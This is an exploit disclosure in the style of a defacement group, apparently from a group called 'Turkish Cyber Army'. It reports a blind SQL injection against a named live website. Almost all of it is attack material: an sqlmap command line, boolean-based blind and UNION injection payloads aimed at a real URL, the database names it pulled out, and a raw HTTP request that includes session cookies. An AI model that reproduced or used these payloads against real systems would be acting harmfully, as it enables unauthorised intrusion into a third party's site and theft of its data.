# Exploit Title : Afriregister Blind SQL İnjection # Team : Sanal Türk Ordusu "Turkish Cyber Army" # Date : 21/03/2020 # Tested On : Windows Server 2012 # Contact : instagram.com/rootayyildiz/ sqlmap.py --level=5 --risk=3 -r bb.hed a.hed -dbs --random-agent --tamper=space2comment --batch Parameter: #1* (URI) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause Payload: http://afriregister.co.tz:80/sitebuilder/viewtemplate_2.php?id=if(now()=sysdate(),sleep(0),0)/-9908 OR 3599=3599# yKNU'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"/&lang=en&prtype=index&tid=64&type=simple& Type: UNION query Title: MySQL UNION query (random number) - 1 column Payload: http://afriregister.co.tz:80/sitebuilder/viewtemplate_2.php?id=if(now()=sysdate(),sleep(0),0)/-5203 UNION ALL SELECT CONCAT(0x716b716a71,0x754b596e62686c766a425a7a5a707948514d4f666550674c7677575a78536f646366495168665343,0x71707a6a71),6563,6563,6563,6563,6563,6563,6563,6563,6563#'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"/&lang=en&prtype=index&tid=64&type=simple& --- web application technology: Apache back-end DBMS: MySQL Unknown available databases [2]: [*] dragonba_sitebuilder [*] information_schema GET /sitebuilder/viewtemplate_2.php?id=if(now()=sysdate()%2csleep(0)%2c0)/*'XOR(if(now()=sysdate()%2csleep(0)%2c0))OR'"XOR(if(now()=sysdate()%2csleep(0)%2c0))OR"*/&lang=en&prtype=index&tid=64&type=simple& HTTP/1.1 X-Requested-With: XMLHttpRequest Referer: https://afriregister.co.tz/ Cookie: crawlprotecttag=present; PHPSESSID=hq23poood0fhfdrrl6q1d5g0u2; MibewSessionID=h36q71qa3o4n7h5lbvi61pjfb5; mibew_locale=en Host: afriregister.co.tz Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21 Accept: */*